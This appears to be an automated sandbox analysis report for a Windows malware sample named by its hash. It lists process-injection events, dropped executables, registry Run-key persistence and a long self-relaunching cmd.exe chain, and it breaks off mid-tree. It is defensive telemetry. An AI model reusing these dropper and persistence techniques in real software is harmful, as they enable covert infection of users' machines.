3348	e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa.exe
3348	e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa.exe
3348	e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa.exe
2384	e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa.exe
2384	e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa.exe
2384	e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa.exe
2384	e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa.exe
2116	e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa.exe
2116	e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa.exe
2116	e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa.exe
2116	e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa.exe
1960	e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa.exe
1960	e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa.exe
1960	e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa.exe
1960	e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa.exe
5796	e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa.exe
5796	e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa.exe
5796	e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa.exe
5796	e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa.exe
5780	e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa.exe
5780	e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa.exe
5780	e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa.exe
5780	e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa.exe
5668	e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa.exe
5668	e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa.exe
5668	e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa.exe
5668	e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa.exe
2480	e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa.exe
2480	e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa.exe
2480	e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa.exe
2480	e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa.exe
1820	e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa.exe
1820	e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa.exe
1820	e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa.exe
1820	e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa.exe

Suspicious behavior: GetForegroundWindowSpam 2 IoCs

Processes:

JIkEQwQQ.exeLWIMogsY.exe

pid process

3068 JIkEQwQQ.exe
4172 LWIMogsY.exe

Suspicious use of FindShellTrayWindow 64 IoCs

Processes:

JIkEQwQQ.exe

pid	process
3068	JIkEQwQQ.exe
3068	JIkEQwQQ.exe
3068	JIkEQwQQ.exe
3068	JIkEQwQQ.exe
3068	JIkEQwQQ.exe
3068	JIkEQwQQ.exe
3068	JIkEQwQQ.exe
3068	JIkEQwQQ.exe
3068	JIkEQwQQ.exe
3068	JIkEQwQQ.exe
3068	JIkEQwQQ.exe
3068	JIkEQwQQ.exe
3068	JIkEQwQQ.exe
3068	JIkEQwQQ.exe
3068	JIkEQwQQ.exe
3068	JIkEQwQQ.exe
3068	JIkEQwQQ.exe
3068	JIkEQwQQ.exe
3068	JIkEQwQQ.exe
3068	JIkEQwQQ.exe
3068	JIkEQwQQ.exe
3068	JIkEQwQQ.exe
3068	JIkEQwQQ.exe
3068	JIkEQwQQ.exe
3068	JIkEQwQQ.exe
3068	JIkEQwQQ.exe
3068	JIkEQwQQ.exe
3068	JIkEQwQQ.exe
3068	JIkEQwQQ.exe
3068	JIkEQwQQ.exe
3068	JIkEQwQQ.exe
3068	JIkEQwQQ.exe
3068	JIkEQwQQ.exe
3068	JIkEQwQQ.exe
3068	JIkEQwQQ.exe
3068	JIkEQwQQ.exe
3068	JIkEQwQQ.exe
3068	JIkEQwQQ.exe
3068	JIkEQwQQ.exe
3068	JIkEQwQQ.exe
3068	JIkEQwQQ.exe
3068	JIkEQwQQ.exe
3068	JIkEQwQQ.exe
3068	JIkEQwQQ.exe
3068	JIkEQwQQ.exe
3068	JIkEQwQQ.exe
3068	JIkEQwQQ.exe
3068	JIkEQwQQ.exe
3068	JIkEQwQQ.exe
3068	JIkEQwQQ.exe
3068	JIkEQwQQ.exe
3068	JIkEQwQQ.exe
3068	JIkEQwQQ.exe
3068	JIkEQwQQ.exe
3068	JIkEQwQQ.exe
3068	JIkEQwQQ.exe
3068	JIkEQwQQ.exe
3068	JIkEQwQQ.exe
3068	JIkEQwQQ.exe
3068	JIkEQwQQ.exe
3068	JIkEQwQQ.exe
3068	JIkEQwQQ.exe
3068	JIkEQwQQ.exe
3068	JIkEQwQQ.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa.execmd.execmd.exee270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa.execmd.execmd.exee270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa.execmd.exe

description	pid	process	target process
PID 5404 wrote to memory of 3068	5404	e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa.exe	JIkEQwQQ.exe
PID 5404 wrote to memory of 3068	5404	e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa.exe	JIkEQwQQ.exe
PID 5404 wrote to memory of 3068	5404	e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa.exe	JIkEQwQQ.exe
PID 5404 wrote to memory of 4172	5404	e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa.exe	LWIMogsY.exe
PID 5404 wrote to memory of 4172	5404	e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa.exe	LWIMogsY.exe
PID 5404 wrote to memory of 4172	5404	e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa.exe	LWIMogsY.exe
PID 5404 wrote to memory of 5396	5404	e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa.exe	cmd.exe
PID 5404 wrote to memory of 5396	5404	e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa.exe	cmd.exe
PID 5404 wrote to memory of 5396	5404	e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa.exe	cmd.exe
PID 5404 wrote to memory of 2344	5404	e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa.exe	reg.exe
PID 5404 wrote to memory of 2344	5404	e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa.exe	reg.exe
PID 5404 wrote to memory of 2344	5404	e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa.exe	reg.exe
PID 5404 wrote to memory of 1664	5404	e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa.exe	reg.exe
PID 5404 wrote to memory of 1664	5404	e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa.exe	reg.exe
PID 5404 wrote to memory of 1664	5404	e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa.exe	reg.exe
PID 5404 wrote to memory of 1816	5404	e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa.exe	reg.exe
PID 5404 wrote to memory of 1816	5404	e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa.exe	reg.exe
PID 5404 wrote to memory of 1816	5404	e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa.exe	reg.exe
PID 5404 wrote to memory of 2324	5404	e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa.exe	cmd.exe
PID 5404 wrote to memory of 2324	5404	e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa.exe	cmd.exe
PID 5404 wrote to memory of 2324	5404	e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa.exe	cmd.exe
PID 5396 wrote to memory of 4712	5396	cmd.exe	e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa.exe
PID 5396 wrote to memory of 4712	5396	cmd.exe	e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa.exe
PID 5396 wrote to memory of 4712	5396	cmd.exe	e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa.exe
PID 2324 wrote to memory of 2264	2324	cmd.exe	cscript.exe
PID 2324 wrote to memory of 2264	2324	cmd.exe	cscript.exe
PID 2324 wrote to memory of 2264	2324	cmd.exe	cscript.exe
PID 4712 wrote to memory of 1316	4712	e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa.exe	cmd.exe
PID 4712 wrote to memory of 1316	4712	e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa.exe	cmd.exe
PID 4712 wrote to memory of 1316	4712	e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa.exe	cmd.exe
PID 1316 wrote to memory of 3508	1316	cmd.exe	e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa.exe
PID 1316 wrote to memory of 3508	1316	cmd.exe	e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa.exe
PID 1316 wrote to memory of 3508	1316	cmd.exe	e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa.exe
PID 4712 wrote to memory of 428	4712	e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa.exe	reg.exe
PID 4712 wrote to memory of 428	4712	e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa.exe	reg.exe
PID 4712 wrote to memory of 428	4712	e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa.exe	reg.exe
PID 4712 wrote to memory of 3740	4712	e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa.exe	reg.exe
PID 4712 wrote to memory of 3740	4712	e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa.exe	reg.exe
PID 4712 wrote to memory of 3740	4712	e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa.exe	reg.exe
PID 4712 wrote to memory of 5520	4712	e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa.exe	reg.exe
PID 4712 wrote to memory of 5520	4712	e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa.exe	reg.exe
PID 4712 wrote to memory of 5520	4712	e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa.exe	reg.exe
PID 4712 wrote to memory of 2348	4712	e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa.exe	cmd.exe
PID 4712 wrote to memory of 2348	4712	e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa.exe	cmd.exe
PID 4712 wrote to memory of 2348	4712	e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa.exe	cmd.exe
PID 2348 wrote to memory of 6076	2348	cmd.exe	cscript.exe
PID 2348 wrote to memory of 6076	2348	cmd.exe	cscript.exe
PID 2348 wrote to memory of 6076	2348	cmd.exe	cscript.exe
PID 3508 wrote to memory of 2004	3508	e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa.exe	cmd.exe
PID 3508 wrote to memory of 2004	3508	e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa.exe	cmd.exe
PID 3508 wrote to memory of 2004	3508	e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa.exe	cmd.exe
PID 2004 wrote to memory of 5652	2004	cmd.exe	e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa.exe
PID 2004 wrote to memory of 5652	2004	cmd.exe	e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa.exe
PID 2004 wrote to memory of 5652	2004	cmd.exe	e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa.exe
PID 3508 wrote to memory of 3732	3508	e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa.exe	reg.exe
PID 3508 wrote to memory of 3732	3508	e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa.exe	reg.exe
PID 3508 wrote to memory of 3732	3508	e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa.exe	reg.exe
PID 3508 wrote to memory of 5508	3508	e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa.exe	reg.exe
PID 3508 wrote to memory of 5508	3508	e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa.exe	reg.exe
PID 3508 wrote to memory of 5508	3508	e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa.exe	reg.exe
PID 3508 wrote to memory of 2380	3508	e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa.exe	reg.exe
PID 3508 wrote to memory of 2380	3508	e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa.exe	reg.exe
PID 3508 wrote to memory of 2380	3508	e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa.exe	reg.exe
PID 3508 wrote to memory of 5488	3508	e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa.exe	cmd.exe

C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa.exe
"C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa.exe"
1⤵
- Adds Run key to start application
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:5404

C:\Users\Admin\TcwcwEMA\JIkEQwQQ.exe
"C:\Users\Admin\TcwcwEMA\JIkEQwQQ.exe"
2⤵
- Executes dropped EXE
- Adds Run key to start application
- Drops file in System32 directory
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of FindShellTrayWindow
PID:3068

C:\ProgramData\WsQYcsws\LWIMogsY.exe
"C:\ProgramData\WsQYcsws\LWIMogsY.exe"
2⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious behavior: GetForegroundWindowSpam
PID:4172

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa"
2⤵
- Suspicious use of WriteProcessMemory
PID:5396

C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa.exe
C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:4712

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa"
4⤵
- Suspicious use of WriteProcessMemory
PID:1316

C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa.exe
C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa
5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:3508

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa"
6⤵
- Suspicious use of WriteProcessMemory
PID:2004

C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa.exe
C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa
7⤵
- Suspicious behavior: EnumeratesProcesses
PID:5652

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa"
8⤵
PID:224

C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa.exe
C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa
9⤵
- Suspicious behavior: EnumeratesProcesses
PID:5544

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa"
10⤵
PID:4548

C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa.exe
C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa
11⤵
- Suspicious behavior: EnumeratesProcesses
PID:4264

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa"
12⤵
PID:4852

C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa.exe
C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa
13⤵
- Suspicious behavior: EnumeratesProcesses
PID:3400

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa"
14⤵
PID:6000

C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa.exe
C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa
15⤵
- Suspicious behavior: EnumeratesProcesses
PID:3348

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa"
16⤵
PID:2156

C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa.exe
C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa
17⤵
- Suspicious behavior: EnumeratesProcesses
PID:2384

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa"
18⤵
PID:5040

C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa.exe
C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa
19⤵
- Suspicious behavior: EnumeratesProcesses
PID:2116

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa"
20⤵
PID:1108

C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa.exe
C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa
21⤵
- Suspicious behavior: EnumeratesProcesses
PID:1960

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa"
22⤵
PID:336

C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa.exe
C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa
23⤵
- Suspicious behavior: EnumeratesProcesses
PID:5796

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa"
24⤵
PID:1396

C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa.exe
C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa
25⤵
- Suspicious behavior: EnumeratesProcesses
PID:5780

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa"
26⤵
PID:5548

C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa.exe
C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa
27⤵
- Suspicious behavior: EnumeratesProcesses
PID:5668

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa"
28⤵
PID:2816

C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa.exe
C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa
29⤵
- Suspicious behavior: EnumeratesProcesses
PID:2480

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa"
30⤵
PID:4532

C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa.exe
C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa
31⤵
- Suspicious behavior: EnumeratesProcesses
PID:1820

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa"
32⤵
PID:6012

C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa.exe
C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa
33⤵
PID:5316

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa"
34⤵
PID:1840

C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa.exe
C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa
35⤵
PID:3260

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa"
36⤵
PID:3908

C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa.exe
C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa
37⤵
PID:3444

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa"
38⤵
PID:4092

C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa.exe
C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa
39⤵
PID:4644

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa"
40⤵
PID:3004

C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa.exe
C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa
41⤵
PID:1188

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa"
42⤵
PID:4948

C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa.exe
C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa
43⤵
PID:4572

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa"
44⤵
PID:4448

C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa.exe
C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa
45⤵
PID:3512

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa"
46⤵
PID:2476

C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa.exe
C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa
47⤵
PID:584

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa"
48⤵
PID:5024

C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa.exe
C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa
49⤵
PID:2092

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa"
50⤵
PID:940

C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa.exe
C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa
51⤵
PID:5312

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa"
52⤵
PID:2256

C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa.exe
C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa
53⤵
PID:1644

C:\Windows\SysWOW64\cmd.exe
